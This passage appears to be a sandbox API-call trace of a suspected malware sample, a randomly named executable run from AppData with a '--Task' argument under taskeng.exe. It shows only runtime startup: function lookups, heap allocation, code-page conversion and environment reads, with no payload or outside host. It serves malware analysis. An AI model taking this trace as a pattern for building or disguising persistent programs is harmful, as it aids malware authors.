lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0158.575] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0158.576] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0158.577] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0158.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3bc) returned 0xcef420 [0158.577] GetCurrentThreadId () returned 0xa18 [0158.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0xce2268 [0158.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x800) returned 0xcef7e8 [0158.577] GetStartupInfoW (in: lpStartupInfo=0x18f298 | out: lpStartupInfo=0x18f298*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x6d0284ca, hStdError=0x58)) [0158.577] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0158.577] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0158.578] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0158.578] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task" [0158.578] GetEnvironmentStringsW () returned 0xcefff0* [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xaca) returned 0xcf0ac8 [0158.578] FreeEnvironmentStringsW (penv=0xcefff0) returned 1 [0158.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\onb5h0yx46mrevq4.exe")) returned 0x65 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xe6) returned 0xcf15a0 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x98) returned 0xcf1690 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3e) returned 0xce5828 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x6c) returned 0xcf1730 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x6e) returned 0xcf17a8 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x78) returned 0xce2d28 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x62) returned 0xcf1820 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2e) returned 0xceb150 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x48) returned 0xce6cd0 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x28) returned 0xceab10 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1a) returned 0xcef058 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x4a) returned 0xcf1890 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x72) returned 0xce2da8 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x30) returned 0xceb188 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2e) returned 0xceb1c0 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1c) returned 0xcef080 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0xd2) returned 0xcf18e8 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x7c) returned 0xcf19c8 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x36) returned 0xcf1a50 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3a) returned 0xce5870 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x90) returned 0xcf1a90 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x24) returned 0xceab40 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x30) returned 0xceb1f8 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x36) returned 0xcf1b28 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x48) returned 0xce6d20 [0158.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x52) returned 0xcf1b68 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3c) returned 0xce58b8 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x82) returned 0xcf1bc8 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2e) returned 0xceb230 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1e) returned 0xcef0a8 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2c) returned 0xceb268 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x54) returned 0xcf1c58 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x52) returned 0xcf1cb8 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2a) returned 0xceb2a0 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3c) returned 0xce5900 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x54) returned 0xcf1d18 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x24) returned 0xceab70 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x30) returned 0xceb2d8 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x8c) returned 0xcf1d78 [0158.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcf0ac8 | out: hHeap=0xcd0000) returned 1 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x800) returned 0xcefff0 [0158.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x80) returned 0xcf1e10 [0158.579] GetLastError () returned 0x0 [0158.579] SetLastError (dwErrCode=0x0) [0158.579] GetLastError () returned 0x0 [0158.580] SetLastError (dwErrCode=0x0) [0158.580] GetLastError () returned 0x0 [0158.580] SetLastError (dwErrCode=0x0) [0158.580] GetACP () returned 0x4e4 [0158.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x220) returned 0xcf07f8 [0158.580] GetLastError () returned 0x0 [0158.580] SetLastError (dwErrCode=0x0) [0158.580] IsValidCodePage (CodePage=0x4e4) returned 1 [0158.580] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f28c | out: lpCPInfo=0x18f28c) returned 1 [0158.580] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ed54 | out: lpCPInfo=0x18ed54) returned 1 [0158.580] GetLastError () returned 0x0 [0158.580] SetLastError (dwErrCode=0x0) [0158.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0158.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18ead8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0158.580] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ed68 | out: lpCharType=0x18ed68) returned 1 [0158.580] GetLastError () returned 0x0 [0158.580] SetLastError (dwErrCode=0x0) [0158.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0158.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18eaa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0158.580] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0158.580] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e898, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0158.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f068, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿZ\x84\x02m¤ò\x18", lpUsedDefaultChar=0x0) returned 256 [0158.580] GetLastError () returned 0x0 [0158.580] SetLastError (dwErrCode=0x0) [0158.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0158.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18eab8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0158.581] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0158.581] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e8a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0158.581] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18ef68, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿZ\x84\x02m¤ò\x18", lpUsedDefaultChar=0x0) returned 256 [0158.581] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0158.581] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4088ff [0158.581] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0158.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1f) returned 0xcef0d0 [0158.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0xcef0d0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0158.581] GetLastError () returned 0x0 [0158.581] SetLastError (dwErrCode=0x0) [0158.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0xcf1e98 [0158.581] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e98) returned 0x4 [0158.581] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1e98, Size=0x8) returned 0xcf1e98 [0158.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0158.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x36) returned 0xcf1ea8 [0158.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0xcf1ea8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] RtlSizeHeap 